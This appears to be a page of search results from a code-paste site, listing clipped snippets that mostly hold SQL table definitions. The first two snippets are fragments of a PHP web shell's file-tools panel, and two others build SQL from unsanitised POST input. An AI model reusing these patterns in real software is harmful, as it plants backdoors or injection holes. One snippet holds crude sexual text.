42.7K results in 803 ms
8 years ago · Mar 01, 2018, 03:24 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · Mar 01, 2018, 02:56 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · Mar 01, 2018, 02:36 PM
finish_cycle = TRUE; DROP TEMPORARY TABLE IF EXISTS monitoring; CREATE TEMPORARY TABLE monitoring ( `department_id`
8 years ago · Mar 01, 2018, 02:34 PM
NAMES utf8mb4; DROP TABLE IF EXISTS `fields_values`; CREATE TABLE `fields_values` ( `id` bigint(20) NOT NULL AUTO_INCREMENT, `field_id` bigint(20)
8 years ago · Mar 01, 2018, 01:26 PM
for line in spec.split("\n") if not line.startswith("#")] dbns = [l for
8 years ago · Mar 01, 2018, 01:26 PM
for line in spec.split("\n") if not line.startswith("#")] dbns = [l for
8 years ago · Mar 01, 2018, 01:02 PM
exists word_list"); String sql1 = "create table if not exists word_list(word varchar(30),meaning varchar(100))"; db.execSQL(sql1);
8 years ago · Mar 01, 2018, 12:42 PM
0,0 +1,19 @@ +DROP TABLE IF EXISTS `ctf_teams`; +CREATE TABLE `ctf_teams` ( + `teamId` int(4) NOT NULL DEFAULT '0', + `teamName`
8 years ago · Mar 01, 2018, 12:08 PM
USE `moviedash` ; -- ----------------------------------------------------- -- Table `moviedash`.`genres` -- ----------------------------------------------------- CREATE TABLE IF NOT EXISTS `moviedash`.`genres` ( `id` INT(11) NOT
8 years ago · Mar 01, 2018, 10:26 AM
ConnectString 'TemporaryCn.Open ConnectString TemporaryCmd.CommandText = "Create Temporary Table If Not Exists temp_table (current_stock Int(11))" Debug.Print
8 years ago · Mar 01, 2018, 10:08 AM
statements for procedure here if exists( select Emp_Id from Employee
8 years ago · Mar 01, 2018, 09:45 AM
with this exact name if it exists" id="searchButton" class="searchButton"/> </div> </form> </div>
8 years ago · Mar 01, 2018, 08:56 AM
showing the search results. If not defined, uses the settings
8 years ago · Mar 01, 2018, 08:48 AM
held $target closely, but not too close", "1441": "remove shit yiffs\n", "1442": "If $target layed an egg
8 years ago · Mar 01, 2018, 08:46 AM
tblName = $_POST ['shortName']; $query = "CREATE TABLE IF NOT EXISTS $tblName LIKE mcTable"; $result
8 years ago · Mar 01, 2018, 08:28 AM
content, set the orderBy if not null // retrieve and return
8 years ago · Mar 01, 2018, 07:54 AM
DROP TABLE IF EXISTS `companies`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `companies` ( `id` int(11)
8 years ago · Mar 01, 2018, 07:22 AM
tblName = $_POST ['shortName']; $query = "CREATE TABLE IF NOT EXISTS $tblName LIKE mcTable"; $result
8 years ago · Mar 01, 2018, 06:46 AM
table `questbugs` */ DROP TABLE IF EXISTS `questbugs`; CREATE TABLE `questbugs` ( `id` int(10) NOT NULL AUTO_INCREMENT COMMENT 'Row
Total pages: 2134